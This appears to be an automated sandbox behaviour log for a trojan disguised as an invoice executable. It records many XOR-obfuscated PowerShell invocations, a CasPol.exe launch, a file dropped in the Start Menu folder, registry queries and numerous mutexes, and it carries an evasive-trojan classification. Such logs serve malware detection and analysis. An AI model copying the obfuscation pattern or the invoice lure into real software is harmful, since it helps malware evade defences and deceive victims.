Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B72 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\INVOICE-98656789.exe
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6561763A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x46696E3A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x41286F7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72342273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7838326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3030326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x70203273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30783A6F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A5436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7274773E -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C416E33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F632A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C6B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3078316F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x69203227 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x34302B2F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723372 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A513A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x74466B33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6E74672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2869706C -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3734306B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x202C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723072 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A503A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x61644436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C652A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F77522D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F634377 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6972337F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B72 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

0_2_00403395

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File created: C:\Users\user\AppData\Local\Temp\nsmC268.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winEXE@238/22@1/1

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_00402178 CoCreateInstance,MultiByteToWideChar,

0_2_00402178

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_0040477C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040477C

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2152:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8724:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9964:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9840:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9780:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9468:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9972:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
